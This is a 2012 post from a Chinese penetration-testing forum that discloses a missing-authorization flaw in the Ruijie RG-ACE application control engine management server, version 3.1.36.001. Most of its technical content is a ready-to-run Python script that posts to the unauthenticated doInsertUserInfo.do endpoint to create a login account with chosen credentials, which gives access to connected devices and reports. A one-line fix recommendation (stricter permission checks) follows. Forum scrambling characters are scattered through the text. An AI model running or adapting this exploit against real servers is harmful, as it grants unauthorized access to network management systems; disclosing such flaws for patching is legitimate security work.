找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2590|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)0 B. s1 H. N0 [( h2 O  C

1 Q; L# E1 ?: x7 D" D& L5 x
  C, A* P- }2 ]& _: N7 k测试的具体版本是
9 p. S1 g' n/ B9 J; u1 u1 A产品名称: 锐捷应用控制引擎
9 K) J# i8 G$ e) E4 K9 _7 o版本号: 3.1.36.001 TC
8 i0 Y& S/ E$ W编译时间: 201104291730
% j8 B+ D* L+ D; \ 0 q+ h! @+ {  Q; B. ?3 b0 F
7 ^% x; `% D2 o1 O/ j
漏洞证明:9 |7 {0 B% R' r# ~; w7 s
2 A. ^1 E1 w1 r8 F6 g% u
' \6 h: w: v$ q: t) a! T8 t/ z
8 d  }; ~& Y3 x0 z0 C& m6 ?5 ~

) d8 v' m+ p9 ^; L- s" _# R* C9 s* b1 J7 Q+ Y+ V

' o& E4 B- z4 e: V/ r# O执行脚本. Z6 w" u( m4 b- J( H
#! /usr/bin/env python
% c' \2 I& o$ [#coding=gbk( o" u5 z: g" Z8 V; _$ L
#RG-ACE管理服务器 V3.1.36.001/ Y/ z0 m- y, [/ E' X( W5 `
import urllib2, urllib,cookielib" i# e' G' w5 X
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP9 x6 q7 i" D5 s
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
( o- V: t* o# c! X* {opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]1 f; Z* V9 d$ Q& l3 p
post=(("event","userManager.doInsertUserInfo"),
# B, z8 P; X6 c4 g7 l1 x- b. }("useractionname","addButtonValue"),: k# w0 J0 u1 S" C: z% W
("useropermanager","userManager"),& o$ R! v+ i0 |
("userName","t"), #######账号自己加# T7 Q; d% J8 k7 |7 }
("pwd","aaaaaa"),######密码自己加8 Y) O" @; O6 C4 N& C
("trueName","ad"),
$ i6 \( f3 s* @. N# f7 g- q("email",""),3 a, Q8 f* |5 z$ O
("mobilePhone",""),
$ g% U! @% b; H& [/ }0 i("officePhone",""),' ~0 Z3 k6 F# ]0 |7 }
("addr",""),# ^  m( z  ^9 p' _
("submit","确定"))
- }; o; y$ s! }5 P# l/ M8 ourllib2.install_opener(opener)2 J1 O. f+ }9 B0 {1 z3 L
p=urllib2.urlopen(url, urllib.urlencode(post)).read()' h# Z7 }. u3 r" J
print "Done"/ D! ~0 D! S$ P) N* J5 T

, f. u$ B6 o8 w9 Y登录,连接设备" S! p0 H: _1 x; m

% e) I# B0 y! @+ D# K# u. A4 W, r* q2 K" S, |2 `% D

3 ^! j) h8 u2 `* P0 |: q" Q
, |8 @: {) Z6 Z$ F) `1 }
/ R5 ^! `  O8 R7 }1 s; L) @/ B) r默认的管理员admin权限更大点/ @. e" @0 B: Z: t' D( W

  [' W9 w3 K  p) d) [' {6 F+ `+ Y  i4 z$ E/ }, E, ]2 b. N/ Y

9 Y( y; r! D: B' u 4 C% a8 N0 Z: `

) @7 D, P* [  J$ g' P& {修复方案:. B5 |  f' _( D/ J- [* L
加强对接口的权限验证: [5 Q* M# F" A2 ?0 [+ x6 [
! u' c; C8 ]7 n. n3 I! y
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表